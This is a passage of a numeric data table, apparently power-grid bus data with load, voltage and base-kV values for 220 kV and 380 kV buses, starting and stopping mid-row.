0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1360, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1361, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1362, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1363, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1364, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1365, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1366, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1367, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1368, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1369, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1370, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1371, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1372, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1373, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1374, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1375, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1376, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1377, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1378, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1379, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1380, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1381, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1382, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1383, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1384, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1385, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1386, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1387, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1388, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1389, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1390, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1391, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1392, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1393, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1394, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1395, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1396, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1397, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1398, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1399, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1400, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1401, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1402, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1403, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1404, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1405, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1406, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1407, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1408, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1409, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1410, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1411, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1412, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1413, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1414, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1415, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1416, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1417, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1418, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1419, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1420, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1421, 2, 0, 0, 0, 0, 0, 0.999642, 0, 220.0, 0, 1.1, 0.9 ], [1422, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1423, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1424, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1425, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1426, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1427, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1428, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1429, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1430, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1431, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1432, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1433, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1434, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1435, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1436, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1437, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1438, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1439, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1440, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1441, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1442, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1443, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1444, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1445, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1446, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1447, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1448, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1449, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1450, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1451, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1452, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1453, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1454, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1455, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1456, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1457, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1458, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1459, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1460, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1461, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1462, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1463, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1464, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1465, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1466, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1467, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1468, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1469, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1470, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1471, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1472, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1473, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1474, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1475, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1476, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1477, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1479, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1480, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1481, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1482, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1483, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1484, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1485, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1486, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1487, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1488, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1489, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1490, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1491, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1492, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1493, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1494, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1495, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1496, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1497, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1498, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1499, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1500, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1501, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1502, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1503, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1504, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1505, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1506, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1507, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1508, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1510, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1511, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1512, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1513, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1514, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1516, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1517, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1518, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1519, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1, 1, 231.731249, 46.34625, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [2, 1, 0, 0, 0, 0, 0, 1.000012, 0, 380.0, 0, 1.1, 0.9 ], [3, 1, 40.616255, 8.123251, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [4, 1, 66.794779, 13.358956, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [5, 1, 0, 0, 0, 0, 0, 0.99986, 0, 380.0, 0, 1.1, 0.9 ], [6, 1, 196.137157, 39.227431, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [7, 1, 147.813738, 29.562748, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [8, 1, 123.679975, 24.735995, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [9, 1, 83.642834, 16.728567, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [10, 1, 0, 0, 0, 0, 0, 0.99923, 0, 380.0, 0, 1.1, 0.9 ], [11, 1, 73.285381, 14.657076, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [12, 1, 0, 0, 0, 0, 0, 1.000569, 0, 380.0, 0, 1.1, 0.9 ], [13, 1, 0, 0, 0, 0, 0, 0.999918, 0, 380.0, 0, 1.1, 0.9 ], [14, 1, 175.271748, 35.05435, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [15, 1, 0, 0, 0, 0, 0, 1.000476, 0, 380.0, 0, 1.1, 0.9 ], [16, 1, 298.919571, 59.783914, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [17, 1, 70.403411, 14.080682, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [18, 1, 0, 0, 0, 0, 0, 1.002403, 0, 380.0, 0, 1.1, 0.9 ], [19, 1, 173.94029, 34.788058, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [20, 1, 0, 0, 0, 0, 0, 0.997647, 0, 380.0, 0, 1.1, 0.9 ], [21, 1, 747.969927, 149.593985, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [22, 1, 0, 0, 0, 0, 0, 1.000045, 0, 380.0, 0, 1.1, 0.9 ], [23, 1, 97.934624, 19.586925, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [24, 1, 0, 0, 0, 0, 0, 0.999996, 0, 380.0, 0, 1.1, 0.9 ], [25, 1, 46.842813, 9.368563, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [26, 1, 0, 0, 0, 0, 0, 1.000582, 0, 380.0, 0, 1.1, 0.9 ], [27, 1, 57.50085, 11.50017, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [28, 1, 169.897785, 33.979557, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [29, 1, 62.406994, 12.481399, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [30, 1, 0, 0, 0, 0, 0, 0.999215, 0, 380.0, 0, 1.1, 0.9 ], [31, 1, 122.815352, 24.56307, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [32, 1, 0, 0, 0, 0, 0, 0.999371, 0, 380.0, 0, 1.1, 0.9 ], [33, 1, 153.987372, 30.797474, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [34, 1, 30.550372, 6.110074, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [35, 1, 2.022596, 0.404519, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [36, 1, 6.696525, 1.339305, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [37, 1, 0, 0, 0, 0, 0, 1.003427, 0, 380.0, 0, 1.1, 0.9 ], [38, 1, 161.334236, 32.266847, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [39, 1, 52.82865, 10.56573, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [40, 1, 55.181177, 11.036235, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [41, 1, 59.307259, 11.861452, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [42, 1, 0, 0, 0, 0, 0, 1.00127, 0, 380.0, 0, 1.1, 0.9 ], [43, 1, 90.950355, 18.190071, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [44, 1, 116.357494, 23.271499, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [45, 1, 61.76516, 12.353032, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [46, 1, 0, 0, 0, 0, 0, 1.000195, 0, 380.0, 0, 1.1, 0.9 ], [47, 1, 268.559873, 53.711975, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [48, 1, 184.599149, 36.91983, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [49, 1, 46.694271, 9.338854, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [50, 1, 67.993162, 13.598632, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [51, 1, 88.1147, 17.62294, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [52, 1, 0, 0, 0, 0, 0, 1.00022, 0, 380.0, 0, 1.1, 0.9 ], [53, 1, 133.699944, 26.739989, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [54, 1, 67.927356, 13.585471, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [55, 1, 66.616885, 13.323377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [56, 1, 0, 0, 0, 0, 0, 0.999715, 0, 380.0, 0, 1.1, 0.9 ], [57, 1, 79.519751, 15.90395, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [58, 1, 182.152085, 36.430417, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [59, 1, 52.023749, 10.40475, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [60, 1, 27.428364, 5.485673, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [61, 1, 0, 0, 0, 0, 0, 1.000414, 0, 380.0, 0, 1.1, 0.9 ], [62, 1, 209.107793, 41.821559, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [63, 1, 123.43454, 24.686908, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [64, 1, 1309.890612, 261.978122, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [65, 1, 4.364577, 0.872915, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [66, 1, 138.483067, 27.696613, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [67, 1, 297.069506, 59.413901, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [68, 1, 0, 0, 0, 0, 0, 0.999017, 0, 380.0, 0, 1.1, 0.9 ], [69, 1, 0, 0, 0, 0, 0, 1.000338, 0, 380.0, 0, 1.1, 0.9 ], [70, 1, 561.987748, 112.39755, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [71, 1, 130.598714, 26.119743, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [72, 1, 213.902772, 42.780554, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [73, 1, 68.478338, 13.695668, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [74, 1, 0, 0, 0, 0, 0, 1.001257, 0, 380.0, 0, 1.1, 0.9 ], [75, 1, 85.34811, 17.069622, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [76, 1, 82.379652, 16.47593, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [77, 1, 79.790323, 15.958065, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [78, 1, 0, 0, 0, 0, 0, 0.998578, 0, 380.0, 0, 1.1, 0.9 ], [79, 1, 82.389658, 16.477932, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [80, 1, 87.510529, 17.502106, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [81, 1, 98.787469, 19.757494, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [82, 1, 3.287705, 0.657541, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [83, 1, 219.971708, 43.994342, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [84, 1, 21.654857, 4.330971, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [85, 1, 75.094841, 15.018968, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [86, 1, 0, 0, 0, 0, 0, 0.99999, 0, 380.0, 0, 1.1, 0.9 ], [87, 1, 0, 0, 0, 0, 0, 0.999893, 0, 380.0, 0, 1.1, 0.9 ], [88, 1, 60.61149, 12.122298, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [89, 1, 75.19783, 15.039566, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [90, 1, 86.850174, 17.370035, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [91, 1, 30.167426, 6.033485, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [92, 1, 32.923245, 6.584649, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [93, 1, 32.291108, 6.458222, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [94, 1, 0, 0, 0, 0, 0, 1.000973, 0, 380.0, 0, 1.1, 0.9 ], [95, 1, 0, 0, 0, 0, 0, 1.000565, 0, 380.0, 0, 1.1, 0.9 ], [96, 1, 0, 0, 0, 0, 0, 0.999998, 0, 380.0, 0, 1.1, 0.9 ], [97, 1, 4.541503, 0.908301, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [98, 1, 83.499975, 16.699995, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [99, 1, 0, 0, 0, 0, 0, 1.000662, 0, 380.0, 0, 1.1, 0.9 ], [100, 1, 0, 0, 0, 0, 0, 1.001548, 0, 380.0, 0, 1.1, 0.9 ], [101, 1, 59.126497, 11.825299, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [102, 1, 114.442092, 22.888418, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [103, 1, 133.80495, 26.76099, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [104, 1, 0, 0, 0, 0, 0, 0.999976, 0, 380.0, 0, 1.1, 0.9 ], [105, 1, 0, 0, 0, 0, 0, 1.000122, 0, 380.0, 0, 1.1, 0.9 ], [106, 1, 0, 0, 0, 0, 0, 0.999947, 0, 380.0, 0, 1.1, 0.9 ], [107, 1, 0, 0, 0, 0, 0, 0.999994, 0, 380.0, 0, 1.1, 0.9 ], [108, 1, 94.383079, 18.876616, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [109, 1, 38.214098, 7.64282, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [110, 1, 49.603431, 9.920686, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [111, 1, 87.414649, 17.48293, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [112, 1, 44.242831, 8.848566, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [113, 1, 69.74273, 13.948546, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [114, 1, 102.713986, 20.542797, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [115, 1, 66.213668, 13.242734, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [116, 1, 110.799468, 22.159894, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [117, 1, 0, 0, 0, 0, 0, 1.000509, 0, 380.0, 0, 1.1, 0.9 ], [118, 1, 171.557122, 34.311424, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [119, 1, 33.254815, 6.650963, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [120, 1, 0, 0, 0, 0, 0, 1.001281, 0, 380.0, 0, 1.1, 0.9 ], [121, 1, 45.160054, 9.032011, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [122, 1, 39.537169, 7.907434, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [123, 1, 0, 0, 0, 0, 0, 1.000232, 0, 380.0, 0, 1.1, 0.9 ], [124, 1, 0, 0, 0, 0, 0, 1.000003, 0, 380.0, 0, 1.1, 0.9 ], [125, 1, 0, 0, 0, 0, 0, 0.999899, 0, 380.0, 0, 1.1, 0.9 ], [126, 1, 207.294358, 41.458872, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [127, 1, 160.260346, 32.052069, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [128, 1, 0, 0, 0, 0, 0, 1.001421, 0, 380.0, 0, 1.1, 0.9 ], [129, 1, 0, 0, 0, 0, 0, 1.000001, 0, 380.0, 0, 1.1, 0.9 ], [130, 1, 220.969864, 44.193973, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [131, 1, 48.789955, 9.757991, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [132, 1, 127.041666, 25.408333, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [133, 1, 42.553981, 8.510796, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], 